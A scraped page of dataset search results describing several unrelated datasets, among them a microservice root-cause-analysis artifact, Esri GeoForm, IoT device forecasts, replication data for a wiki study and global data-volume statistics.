    Ha, Huong (2024). Dataset Artifact for paper "Root Cause Analysis for Microservice System based on Causal Inference: How Far Are We?" [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_13305662
    Explore at:
    Dataset updated
    Aug 25, 2024
    Dataset provided by
    Pham, Luan
    Zhang, Hongyu
    Ha, Huong
    License

    Attribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Artifacts for the paper titled Root Cause Analysis for Microservice System based on Causal Inference: How Far Are We?.

    This artifact repository contains 9 compressed folders, as follows:

    ID File Name Description

    1 syn_circa.zip CIRCA10, and CIRCA50 datasets for Causal Discovery

    2 syn_rcd.zip RCD10, and RCD50 datasets for Causal Discovery

    3 syn_causil.zip CausIL10, and CausIL50 datasets for Causal Discovery

    4 rca_circa.zip CIRCA10, and CIRCA50 datasets for RCA

    5 rca_rcd.zip RCD10, and RCD50 datasets for RCA

    6 online-boutique.zip Online Boutique dataset for RCA

    7 sock-shop-1.zip Sock Shop 1 dataset for RCA

    8 sock-shop-2.zip Sock Shop 2 dataset for RCA

    9 train-ticket.zip Train Ticket dataset for RCA

    Each zip file contains the generated/collected data from the corresponding data generator or microservice benchmark systems (e.g., online-boutique.zip contains metrics data collected from the Online Boutique system).

    Details about the generation of our datasets

    1. Synthetic datasets

    We use three different synthetic data generators from three previous RCA studies [15, 25, 28] to create the synthetic datasets: CIRCA, RCD, and CausIL data generators. Their mechanisms are as follows:1. CIRCA datagenerator [28] generates a random causal directed acyclic graph (DAG) based on a given number of nodes and edges. From this DAG, time series data for each node is generated using a vector auto-regression (VAR) model. A fault is injected into a node by altering the noise term in the VAR model for two timestamps. 2. RCD data generator [25] uses the pyAgrum package [3] to generate a random DAG based on a given number of nodes, subsequently generating discrete time series data for each node, with values ranging from 0 to 5. A fault is introduced into a node by changing its conditional probability distribution.3. CausIL data generator [15] generates causal graphs and time series data that simulate the behavior of microservice systems. It first constructs a DAG of services and metrics based on domain knowledge, then generates metric data for each node of the DAG using regressors trained on real metrics data. Unlike the CIRCA and RCD data generators, the CausIL data generator does not have the capability to inject faults.To create our synthetic datasets, we first generate 10 DAGs whose nodes range from 10 to 50 for each of the synthetic data generators. Next, we generate fault-free datasets using these DAGs with different seedings, resulting in 100 cases for the CIRCA and RCD generators and 10 cases for the CausIL generator. We then create faulty datasets by introducing ten faults into each DAG and generating the corresponding faulty data, yielding 100 cases for the CIRCA and RCD data generators. The fault-free datasets (e.g. syn_rcd, syn_circa) are used to evaluate causal discovery methods, while the faulty datasets (e.g. rca_rcd, rca_circa) are used to assess RCA methods.

    1. Data collected from benchmark microservice systems

    We deploy three popular benchmark microservice systems: Sock Shop [6], Online Boutique [4], and Train Ticket [8], on a four-node Kubernetes cluster hosted by AWS. Next, we use the Istio service mesh [2] with Prometheus [5] and cAdvisor [1] to monitor and collect resource-level and service-level metrics of all services, as in previous works [ 25 , 39, 59 ]. To generate traffic, we use the load generators provided by these systems and customise them to explore all services with 100 to 200 users concurrently. We then introduce five common faults (CPU hog, memory leak, disk IO stress, network delay, and packet loss) into five different services within each system. Finally, we collect metrics data before and after the fault injection operation. An overview of our setup is presented in the Figure below.

    Code

    The code to reproduce the experimental results in the paper is available at https://github.com/phamquiluan/RCAEval.

    References

    As in our paper.

  14. GeoForm (Deprecated)

    • noveladata.com
    Updated Jul 2, 2014
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    esri_en (2014). GeoForm (Deprecated) [Dataset]. https://www.noveladata.com/items/931653256fd24301a84fc77955914a82
    Explore at:
    Dataset updated
    Jul 2, 2014
    Dataset provided by
    Esrihttp://esri.com/
    Authors
    esri_en
    Description

    Geoform is a configurable app template for form based data editing of a Feature Service. This application allows users to enter data through a form instead of a map's pop-up while leveraging the power of the Web Map and editable Feature Services. This app geo-enables data and workflows by lowering the barrier of entry for completing simple tasks. Use CasesProvides a form-based experience for entering data through a form instead of a map pop-up. This is a good choice for users who find forms a more intuitive format than pop-ups for entering data.Useful to collect new point data from a large audience of non technical staff or members of the community.Configurable OptionsGeoform has an interactive builder used to configure the app in a step-by-step process. Use Geoform to collect new point data and configure it using the following options:Choose a web map and the editable layer(s) to be used for collection.Provide a title, logo image, and form instructions/details.Control and choose what attribute fields will be present in the form. Customize how they appear in the form, the order they appear in, and add hint text.Select from over 15 different layout themes.Choose the display field that will be used for sorting when viewing submitted entries.Enable offline support, social media sharing, default map extent, locate on load, and a basemap toggle button.Choose which locate methods are available in the form, including: current location, search, latitude and longitude, USNG coordinates, MGRS coordinates, and UTM coordinates.Supported DevicesThis application is responsively designed to support use in browsers on desktops, mobile phones, and tablets.Data RequirementsThis web app includes the capability to edit a hosted feature service or an ArcGIS Server feature service. Creating hosted feature services requires an ArcGIS Online organizational subscription or an ArcGIS Developer account. Get Started This application can be created in the following ways:Click the Create a Web App button on this pageShare a map and choose to Create a Web AppOn the Content page, click Create - App - From Template Click the Download button to access the source code. Do this if you want to host the app on your own server and optionally customize it to add features or change styling.

  15. f

    OpenSolution | Web Hosting & Domain Names | Technology Data

    • datastore.forage.ai
    Updated Sep 22, 2024
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    (2024). OpenSolution | Web Hosting & Domain Names | Technology Data [Dataset]. https://datastore.forage.ai/searchresults/?resource_keyword=web
    Explore at:
    Dataset updated
    Sep 22, 2024
    Description

    OpenSolution is a prominent organization that specializes in creating and offering innovative solutions for webmasters. Their flagship products include the Quick.Cms and Quick.Cart systems, which are designed to provide efficient and easy-to-use content management and e-commerce platforms. With over 32,000 websites running on their software, OpenSolution has established itself as a trusted partner for web development companies.

    The company's software is renowned for its intuitive administration panels, excellent Google results, and standards-compliance. OpenSolution also partners with various companies to create custom websites and offers a range of services to support their partners, including offering partnership opportunities for webmasters.

  16. O

    Online Database Report

    • archivemarketresearch.com
    doc, pdf, ppt
    Updated Feb 18, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Archive Market Research (2025). Online Database Report [Dataset]. https://www.archivemarketresearch.com/reports/online-database-32755
    Explore at:
    doc, ppt, pdfAvailable download formats
    Dataset updated
    Feb 18, 2025
    Dataset authored and provided by
    Archive Market Research
    License

    https://www.archivemarketresearch.com/privacy-policyhttps://www.archivemarketresearch.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The online database market is projected to witness significant growth, with a market size of XXX million in 2025 and a CAGR of XX% during the forecast period from 2025 to 2033. This growth is attributed to increasing adoption of cloud computing, growing demand for data analytics, and government initiatives to promote digitalization. Cloud-based databases offer scalability, cost-effectiveness, and ease of deployment, making them attractive for businesses of all sizes. Data analytics is essential for businesses to gain insights from their data and make informed decisions. Online databases provide a centralized platform for data storage and management, facilitating efficient data analysis. Governments across the globe are implementing policies to promote digitalization, driving the adoption of online databases in various sectors, including government, healthcare, and education. Key trends shaping the market include the rise of big data, the adoption of artificial intelligence (AI) and machine learning (ML), and the increasing importance of data security. Big data refers to the exponential growth of data volume, velocity, and variety. Online databases provide the infrastructure to handle and process vast amounts of data. AI and ML algorithms leverage online databases to learn from data and make predictions, driving innovation in various industries. Data security is of utmost importance given the growing threat of cyberattacks. Online databases implement robust security measures to protect sensitive data, ensuring compliance and building trust among users.

  17. a

    ArcGIS Online Fundamentals

    • hub.arcgis.com
    Updated May 17, 2019
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    State of Delaware (2019). ArcGIS Online Fundamentals [Dataset]. https://hub.arcgis.com/documents/263e7ee8ae5a4416b3fe0c0bb7e9bd17
    Explore at:
    Dataset updated
    May 17, 2019
    Dataset authored and provided by
    State of Delaware
    Description

    Enroll in this plan to understand ArcGIS Online capabilities, publish content to an ArcGIS Online organizational site, create web maps and apps, and review common ArcGIS Online administrative tasks.

    Goals Access web maps, apps, and other GIS resources that have been shared to an ArcGIS Online organizational site. Publish GIS data as services to an ArcGIS Online organizational site. Create, configure, and share web maps and apps. Manage ArcGIS Online user roles and privileges.

  18. Internet of Things - number of connected devices worldwide 2015-2025

    • statista.com
    Updated Nov 27, 2016
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Statista (2016). Internet of Things - number of connected devices worldwide 2015-2025 [Dataset]. https://www.statista.com/statistics/471264/iot-number-of-connected-devices-worldwide/
    Explore at:
    Dataset updated
    Nov 27, 2016
    Dataset authored and provided by
    Statistahttp://statista.com/
    Area covered
    Worldwide
    Description

    By 2025, forecasts suggest that there will be more than ** billion Internet of Things (IoT) connected devices in use. This would be a nearly threefold increase from the IoT installed base in 2019. What is the Internet of Things? The IoT refers to a network of devices that are connected to the internet and can “communicate” with each other. Such devices include daily tech gadgets such as the smartphones and the wearables, smart home devices such as smart meters, as well as industrial devices like smart machines. These smart connected devices are able to gather, share, and analyze information and create actions accordingly. By 2023, global spending on IoT will reach *** trillion U.S. dollars. How does Internet of Things work? IoT devices make use of sensors and processors to collect and analyze data acquired from their environments. The data collected from the sensors will be shared by being sent to a gateway or to other IoT devices. It will then be either sent to and analyzed in the cloud or analyzed locally. By 2025, the data volume created by IoT connections is projected to reach a massive total of **** zettabytes. Privacy and security concerns   Given the amount of data generated by IoT devices, it is no wonder that data privacy and security are among the major concerns with regard to IoT adoption. Once devices are connected to the Internet, they become vulnerable to possible security breaches in the form of hacking, phishing, etc. Frequent data leaks from social media raise earnest concerns about information security standards in today’s world; were the IoT to become the next new reality, serious efforts to create strict security stands need to be prioritized.

  19. d

    Replication Data for: Revisiting 'The Rise and Decline' in a Population of...

    • search.dataone.org
    • dataverse.harvard.edu
    Updated Nov 22, 2023
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    TeBlunthuis, Nathan; Aaron Shaw; Benjamin Mako Hill (2023). Replication Data for: Revisiting 'The Rise and Decline' in a Population of Peer Production Projects [Dataset]. http://doi.org/10.7910/DVN/SG3LP1
    Explore at:
    Dataset updated
    Nov 22, 2023
    Dataset provided by
    Harvard Dataverse
    Authors
    TeBlunthuis, Nathan; Aaron Shaw; Benjamin Mako Hill
    Description

    This archive contains code and data for reproducing the analysis for “Replication Data for Revisiting ‘The Rise and Decline’ in a Population of Peer Production Projects”. Depending on what you hope to do with the data you probabbly do not want to download all of the files. Depending on your computation resources you may not be able to run all stages of the analysis. The code for all stages of the analysis, including typesetting the manuscript and running the analysis, is in code.tar. If you only want to run the final analysis or to play with datasets used in the analysis of the paper, you want intermediate_data.7z or the uncompressed tab and csv files. The data files are created in a four-stage process. The first stage uses the program “wikiq” to parse mediawiki xml dumps and create tsv files that have edit data for each wiki. The second stage generates all.edits.RDS file which combines these tsvs into a dataset of edits from all the wikis. This file is expensive to generate and at 1.5GB is pretty big. The third stage builds smaller intermediate files that contain the analytical variables from these tsv files. The fourth stage uses the intermediate files to generate smaller RDS files that contain the results. Finally, knitr and latex typeset the manuscript. A stage will only run if the outputs from the previous stages do not exist. So if the intermediate files exist they will not be regenerated. Only the final analysis will run. The exception is that stage 4, fitting models and generating plots, always runs. If you only want to replicate from the second stage onward, you want wikiq_tsvs.7z. If you want to replicate everything, you want wikia_mediawiki_xml_dumps.7z.001 wikia_mediawiki_xml_dumps.7z.002, and wikia_mediawiki_xml_dumps.7z.003. These instructions work backwards from building the manuscript using knitr, loading the datasets, running the analysis, to building the intermediate datasets. Building the manuscript using knitr This requires working latex, latexmk, and knitr installations. Depending on your operating system you might install these packages in different ways. On Debian Linux you can run apt install r-cran-knitr latexmk texlive-latex-extra. Alternatively, you can upload the necessary files to a project on Overleaf.com. Download code.tar. This has everything you need to typeset the manuscript. Unpack the tar archive. On a unix system this can be done by running tar xf code.tar. Navigate to code/paper_source. Install R dependencies. In R. run install.packages(c("data.table","scales","ggplot2","lubridate","texreg")) On a unix system you should be able to run make to build the manuscript generalizable_wiki.pdf. Otherwise you should try uploading all of the files (including the tables, figure, and knitr folders) to a new project on Overleaf.com. Loading intermediate datasets The intermediate datasets are found in the intermediate_data.7z archive. They can be extracted on a unix system using the command 7z x intermediate_data.7z. The files are 95MB uncompressed. These are RDS (R data set) files and can be loaded in R using the readRDS. For example newcomer.ds <- readRDS("newcomers.RDS"). If you wish to work with these datasets using a tool other than R, you might prefer to work with the .tab files. Running the analysis Fitting the models may not work on machines with less than 32GB of RAM. If you have trouble, you may find the functions in lib-01-sample-datasets.R useful to create stratified samples of data for fitting models. See line 89 of 02_model_newcomer_survival.R for an example. Download code.tar and intermediate_data.7z to your working folder and extract both archives. On a unix system this can be done with the command tar xf code.tar && 7z x intermediate_data.7z. Install R dependencies. install.packages(c("data.table","ggplot2","urltools","texreg","optimx","lme4","bootstrap","scales","effects","lubridate","devtools","roxygen2")). On a unix system you can simply run regen.all.sh to fit the models, build the plots and create the RDS files. Generating datasets Building the intermediate files The intermediate files are generated from all.edits.RDS. This process requires about 20GB of memory. Download all.edits.RDS, userroles_data.7z,selected.wikis.csv, and code.tar. Unpack code.tar and userroles_data.7z. On a unix system this can be done using tar xf code.tar && 7z x userroles_data.7z. Install R dependencies. In R run install.packages(c("data.table","ggplot2","urltools","texreg","optimx","lme4","bootstrap","scales","effects","lubridate","devtools","roxygen2")). Run 01_build_datasets.R. Building all.edits.RDS The intermediate RDS files used in the analysis are created from all.edits.RDS. To replicate building all.edits.RDS, you only need to run 01_build_datasets.R when the int... Visit https://dataone.org/datasets/sha256%3Acfa4980c107154267d8eb6dc0753ed0fde655a73a062c0c2f5af33f237da3437 for complete metadata about this dataset.

  20. T

    Terms of Use Generator Report

    • datainsightsmarket.com
    doc, pdf, ppt
    Updated May 2, 2025
    Share
    FacebookFacebook
    TwitterTwitter
    Email
    Click to copy link
    Link copied
    Close
    Cite
    Data Insights Market (2025). Terms of Use Generator Report [Dataset]. https://www.datainsightsmarket.com/reports/terms-of-use-generator-1963360
    Explore at:
    pdf, doc, pptAvailable download formats
    Dataset updated
    May 2, 2025
    Dataset authored and provided by
    Data Insights Market
    License

    https://www.datainsightsmarket.com/privacy-policyhttps://www.datainsightsmarket.com/privacy-policy

    Time period covered
    2025 - 2033
    Area covered
    Global
    Variables measured
    Market Size
    Description

    The market for Terms of Use Generators is experiencing robust growth, driven by the increasing need for legally compliant online platforms and applications. The expanding digital landscape, encompassing e-commerce, mobile apps, and SaaS solutions, necessitates readily available and cost-effective tools to create legally sound terms of service. This demand fuels the market's expansion, with a significant number of businesses – from small startups to large enterprises – adopting these generators to streamline their legal compliance processes. The market is segmented by application type (mobile apps, e-commerce, websites, SaaS, etc.) and operating systems (Android and iOS), reflecting the diverse needs of different online platforms. The competitive landscape is dynamic, featuring both established players and emerging startups offering varied functionalities and pricing models. While the exact market size is unavailable, considering the strong growth drivers and the increasing digitalization across all sectors, a reasonable estimation places the 2025 market size at approximately $250 million, with a projected Compound Annual Growth Rate (CAGR) of 15% over the forecast period (2025-2033). This growth is likely to be driven by increasing regulatory scrutiny, the simplification of legal complexities offered by these tools, and a rise in user-friendly, intuitive platforms. Several factors contribute to the market's continued expansion. The increasing complexity of data privacy regulations (like GDPR and CCPA) compels businesses to seek compliant solutions. The rise of no-code/low-code development platforms also contributes to the market's growth as these platforms empower non-technical users to create and deploy applications, further increasing the need for readily available Terms of Use generators. Conversely, the market faces challenges such as the potential for inaccuracies in automatically generated terms and the need for ongoing legal review and updates to ensure compliance with evolving regulations. Despite these restraints, the convenience and cost-effectiveness of these generators are likely to outweigh the concerns, leading to sustained market growth in the coming years. Geographic segmentation reveals strong performance across North America and Europe, with emerging markets in Asia Pacific and other regions demonstrating high growth potential.

Share
FacebookFacebook
TwitterTwitter
Email
Click to copy link
Link copied
Close
Cite
Statista (2025). Amount of data created, consumed, and stored 2010-2023, with forecasts to 2028 [Dataset]. https://www.statista.com/statistics/871513/worldwide-data-created/
Organization logo

Amount of data created, consumed, and stored 2010-2023, with forecasts to 2028

Explore at:
Dataset updated
Jun 30, 2025
Dataset authored and provided by
Statistahttp://statista.com/
Time period covered
May 2024
Area covered
Worldwide
Description

The total amount of data created, captured, copied, and consumed globally is forecast to increase rapidly, reaching *** zettabytes in 2024. Over the next five years up to 2028, global data creation is projected to grow to more than *** zettabytes. In 2020, the amount of data created and replicated reached a new high. The growth was higher than previously expected, caused by the increased demand due to the COVID-19 pandemic, as more people worked and learned from home and used home entertainment options more often. Storage capacity also growing Only a small percentage of this newly created data is kept though, as just * percent of the data produced and consumed in 2020 was saved and retained into 2021. In line with the strong growth of the data volume, the installed base of storage capacity is forecast to increase, growing at a compound annual growth rate of **** percent over the forecast period from 2020 to 2025. In 2020, the installed base of storage capacity reached *** zettabytes.

Search
Clear search
Close search
Google apps
Main menu